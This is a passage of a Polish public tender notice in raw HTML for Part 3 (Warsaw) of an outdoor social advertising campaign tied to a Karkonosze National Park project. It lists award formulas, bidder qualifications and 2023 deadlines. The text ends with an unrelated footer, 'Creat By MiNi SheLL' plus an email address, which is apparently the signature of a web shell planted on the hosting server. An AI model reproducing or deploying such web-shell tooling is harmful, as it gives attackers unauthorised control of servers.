budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">1.	Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 PZP, w okresie 3 lat od dnia udzielenia zamówienia podstawowego do wysokości 20% wartości zamówienia. Zamówienia te polegać będą na powtórzeniu usług podobnych do usług stanowiących przedmiot niniejszego zamówienia.<br/>2.	Opis zamówień, o których mowa w art. 214 ust. 1 pkt 7 PZP został zawarty w opisie przedmiotu zamówienia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">A.	Kryterium „Cena” w PLN:<br/>a)	znaczenie kryterium - 60% (0,6);<br/>b)	opis sposobu oceny ofert dla kryterium „Ceny”: <br/>Ccena = (Cmin / C) x 0,6 x 100 pkt<br/> gdzie:<br/>Ccena - liczba uzyskanych punktów dla kryterium „Cena” ocenianej oferty<br/>Cmin - cena w ofercie z najniższą ceną<br/>C - cena w ofercie ocenianej <br/><br/>Pakiet 2:<br/>B. Kryterium: „Dodatkowe nośniki powyżej 50 sztuk&#34;, <br/>a)	znaczenie kryterium - 40% (0,4);<br/>b)	opis sposobu oceny ofert dla kryterium „Dodatkowe nośniki powyżej 50 sztuk”: <br/>Maksymalna liczba dodatkowych nośników: 20 sztuk dla każdego z pakietów 1, 2<br/>G(x)=(H(x) /H(max)) x 0,4 x 100<br/>Gdzie: <br/>G(x) – ilość punktów przyznana ofercie „x” za liczbę dodatkowych nośników<br/>H (x) – Liczba dodatkowych nośników w ofercie ocenianej <br/>H(max) – Liczba dodatkowych nośników w ofercie z najwyższą liczbą nośników”<br/>Ogólna ocena oferty suma punktów w kryteriach: „cena”, i „Dodatkowe nośniki”:<br/>A+B = maksymalnie 100 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe nośniki powyżej 50 sztuk</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest usługa „Outdoorowa kampania społeczna „Głowa do góry” dla projektu pn.: „Poprawa łączności ekologicznej w Karkonoskim Parku Narodowym i jego otulinie” dofinansowanego ze środków Mechanizmu Finansowego EOG na lata 2014 —2021 spełniającego wszystkie wymagania szczegółowe jak poniżej. Przedmiot zamówienia został podzielony na Pakiety:<br/>Pakiet 3 – obejmuje 100 szt. nośników na terenie Warszawy<br/>Szczegółowy opis przedmiotu zamówienia:<br/>1)	Czas trwania ekspozycji: ekspozycja ciągła przez min. 14 dni, w wybranym przedziale czasu w okresie od dnia podpisania umowy do 30 sierpnia 2023r.<br/>2)	Liczba nośników: min. 200 sztuk (Pakiet 3 - 100 szt. Warszawa)<br/>3)	Rodzaj nośników: m.in. tzw. citylight (naścienne, wolnostojące, na wiatach przystankowych), ekrany digitalowe, billboardy, słupy reklamowe, reklamy skrolowane <br/>i inne (w miejscach umożliwiających dotarcie kampanii do jak najszerszego kręgu odbiorców). Lokalizacje bilbordów powinny znajdować się przy ruchliwych ciągach komunikacyjnych pieszych i samochodowych, nieprzesłoniętych innymi budynkami, drzewami, ogrodzeniami, rusztowaniami itp. Wykonawca powinien uwzględnić główne arterie komunikacyjne w danych miastach. <br/>4)	Specyfikacja nośników: Wymiary minimalne nośników: 110 cm x 170 cm, min. 80% nośników oświetlonych, <br/>5)	Spełnienie parametrów zasięgu kampanii wskaźnikiem liczby bezpośrednich kontaktów – VAC (Visibility Adjusted Contact): w sumie wszystkich nośników min. 20 000 000, według poniższego podziału:<br/>Pakiet 3 - min. 10 000 000 Warszawa, <br/><br/>Wykonawca wraz z protokołem odbioru będzie zobowiązany przedstawić szczegółową listę nośników wraz z rzeczywistą ilością kontaktów (zasięgiem). Pod pojęciem VAC rozumie szacunkową liczbę osób, które zetknęły się w danym miejscu z informacją umieszczoną na nośniku w ciągu jednej doby, potwierdzona badaniami, np. tzw. outdoor track prowadzony przez Wykonawcę w ostatnich trzech latach.<br/>6)	Wykonawca wykona druk przesłanych przez Zamawiającego kreacji (4 kreacje we wskazanych przez wykonawcę formatach), zapewni wykonanie montażu i utrzymanie nośników.<br/>7)	Dokładna lokalizacja każdego z nośników zaproponowanych przez Wykonawcę do wykorzystania przy realizacji kampanii informacyjnej wymagać będzie akceptacji ze strony Zamawiającego. W przypadku braku akceptacji pierwszej lokalizacji któregokolwiek z nośników, Wykonawca zobowiązany jest do przedstawienia lokalizacji alternatywnej. Nośniki powinny być estetyczne, wolne od jakichkolwiek form graffiti lub innych malowideł oraz trwałych zabrudzeń. Materiały informacyjne umieszczone na nośniku muszą być w całości widoczne (nie zasłonięte przez inne elementy infrastruktury miejskiej). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79342200-5 - Usługi w zakresie promocji</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">1.	Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 PZP, w okresie 3 lat od dnia udzielenia zamówienia podstawowego do wysokości 20% wartości zamówienia. Zamówienia te polegać będą na powtórzeniu usług podobnych do usług stanowiących przedmiot niniejszego zamówienia.<br/>2.	Opis zamówień, o których mowa w art. 214 ust. 1 pkt 7 PZP został zawarty w opisie przedmiotu zamówienia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">A.	Kryterium „Cena” w PLN:<br/>a)	znaczenie kryterium - 60% (0,6);<br/>b)	opis sposobu oceny ofert dla kryterium „Ceny”: <br/>Ccena = (Cmin / C) x 0,6 x 100 pkt<br/>gdzie:<br/>Ccena - liczba uzyskanych punktów dla kryterium „Cena” ocenianej oferty<br/>Cmin - cena w ofercie z najniższą ceną<br/>C - cena w ofercie ocenianej <br/><br/>Pakiet 3:<br/>B. Kryterium: „Dodatkowe nośniki powyżej 100 sztuk&#34;, <br/>a)	znaczenie kryterium - 40% (0,4);<br/>b)	opis sposobu oceny ofert dla kryterium „Dodatkowe nośniki powyżej 100 sztuk”: <br/>Maksymalna liczba dodatkowych nośników: 40 sztuk <br/>G(x)=(H(x) /H(max)) x 0,4 x 100<br/>Gdzie: <br/>G(x) – ilość punktów przyznana ofercie „x” za liczbę dodatkowych nośników<br/>H (x) – Liczba dodatkowych nośników w ofercie ocenianej <br/>H(max) – Liczba dodatkowych nośników w ofercie z najwyższą liczbą nośników”<br/>Ogólna ocena oferty suma punktów w kryteriach: „cena”, i „Dodatkowe nośniki”:<br/>A+B = maksymalnie 100 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe nośniki powyżej 50 sztuk</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2.	Warunki dotyczące udziału w postępowaniu:<br/>(a)	zdolności do występowania w obrocie gospodarczym <br/>- zamawiający nie stawia warunku w powyższym zakresie;<br/><br/>(b)	uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, <br/>o ile wynika to z odrębnych przepisów <br/>- zamawiający nie stawia warunku w powyższym zakresie;<br/><br/>3) sytuacja ekonomiczna lub finansowa<br/>- zamawiający nie stawia warunku w powyższym zakresie;<br/><br/>4) zdolności techniczne lub zawodowe:<br/><br/>a)	o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą minimalny poziom zdolności w zakresie doświadczenia, a mianowicie: <br/><br/>Pakiet nr 1, 2, 3 <br/>- w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, należycie zrealizowali lub realizują co najmniej trzy usługi o wartości nie mniejszej niż:<br/>Pakiet 1- min. 25 000,00 zł. złotych brutto<br/>Pakiet 2 – min. 25 000,00 zł. złotych brutto<br/>Pakiet 3 - min. 50 000,00 złotych brutto<br/>Każda z tych usług polegała na realizacji działań reklamowych lub informacyjnych na nośnikach outdoor typu citylight i/lub bilboard, a ich zasięg VAC był nie mniejszy niż: <br/>Pakiet 1 - min. 5 000 000 Wrocław, <br/>Pakiet 2 - min. 5 000 000 Poznań. <br/>Pakiet 3 - min. 10 000 000 Warszawa<br/><br/>W przypadku usług, które są w trakcie realizacji, Wykonawca musi wykazać, że do chwili składania ofert, wartość usług wynosi co najmniej:<br/>Pakiet 1 – min. 25 000,00 zł. złotych brutto,<br/>Pakiet 2 – min. 25 000,00 zł. złotych brutto, <br/>Pakiet 3 - min. 50 000,00 złotych brutto.<br/>A ich zasięg VAC był nie mniejszy niż: <br/>Pakiet 1 - min. 5 000 000 Wrocław, <br/>Pakiet 2 - min. 5 000 000 Poznań. <br/>Pakiet 3 - min. 10 000 000 Warszawa<br/><br/>Wykonawca musi wykazać, że przynajmniej jedna z tych usług dotyczyła kampanii o charakterze społecznym. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału <br/>w postępowaniu zamawiający żąda następujących dokumentów: <br/>1)	oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej (załącznik nr 3 do SWZ);<br/>2)	odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji; <br/>2.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w rozdziale XII.C pkt. 3 ppkt.2 SWZ: <br/>1) odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji <br/>i Informacji o Działalności Gospodarczej - składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. Dokumenty powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.<br/>3.	Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 4 pkt. 2, lub gdy dokumenty te nie odnoszą się do wszystkich przypadków, o których mowa w art. 108 ust. 1 pkt 1, 2 i 4 p.z.p., należy zastąpić je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2.	W celu potwierdzenia spełniania warunku dotyczącego zdolności technicznej lub zawodowej określonego w rozdziale XI pkt 2 ppkt 4 SWZ zamawiający żąda od wykonawcy: <br/>1)	wykazu usług wykonanych nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania oraz podmiotów, na rzecz których usługi te zostały wykonane, oraz załączeniem dowodów określających czy usługi zostały wykonane należycie (załącznik nr 4 do SWZ), przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	Zamawiający żąda przedmiotowych środków dowodowych potwierdzających, że oferowane usługi odpowiadają wymaganiom określonym przez Zamawiającego.<br/>2.	Wykaz przedmiotowych środków dowodowych składanych na potwierdzenie, że oferowane Usługi, spełniają określone przez zamawiającego wymagania, cechy lub kryteria:<br/>Wykonawca zobowiązany jest do złożenia wraz z ofertą oświadczenia dotyczącego deklarowanej wartość VAC dla wykonanych usług: <br/>Pakiet 1 - min. 5 000 000 Wrocław, <br/>Pakiet 2 - min. 5 000 000 Poznań. <br/>Pakiet 3 - min. 10 000 000 Warszawa<br/>1)	Wykonawca zobowiązany jest do złożenia wraz z ofertą wykazu rozmieszczenia nośników z podziałem na miasta i rodzaje nośników, których jest dysponentem. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1.	Wykaz przedmiotowych środków dowodowych składanych na potwierdzenie, że oferowane Usługi, spełniają określone przez zamawiającego wymagania, cechy lub kryteria:<br/>Wykonawca zobowiązany jest do złożenia wraz z ofertą oświadczenia dotyczącego deklarowanej wartość VAC dla wykonanych usług: <br/>Pakiet 1 - min. 5 000 000 Wrocław, <br/>Pakiet 2 - min. 5 000 000 Poznań. <br/>Pakiet 3 - min. 10 000 000 Warszawa<br/>2)	Wykaz rozmieszczenia nośników z podziałem na miasta i rodzaje nośników, których jest dysponentem. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Załącznik nr 5 do SWZ – Zobowiązanie podmiotu udostępniającego zasoby<br/>Załącznik nr 6 do SWZ - Oświadczenie o podziale zadań <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum): <br/>1) w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>2) oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji. Umocowanie musi wynikać z treści pełnomocnictwa załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres umocowania;<br/>3) dokumenty, o których mowa w rozdział XII.A obowiązany będzie złożyć każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia <br/>4) wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić odpowiedzialność solidarną za wykonanie umowy; <br/>5) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie Wykonawcę kierującego (lidera), upoważnionego do zaciągania zobowiązań, otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak też dla wszystkich partnerów;<br/>6) Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez lidera lub od wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia łącznie lub każdego z osobna. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-06-30 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę na platformie e-zamówienia za pośrednictwem zakładki „Oferty/wnioski”, widocznej w podglądzie postępowania po zalogowaniu się na konto Wykonawcy. Po wybraniu przycisku „Złóż ofertę” system prezentuje okno składania oferty umożliwiające przekazanie dokumentów elektronicznych, w którym znajdują się dwa pola drag&amp;drop („przeciągnij” i „upuść”) służące do dodawania plików.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-06-30 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-07-29</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com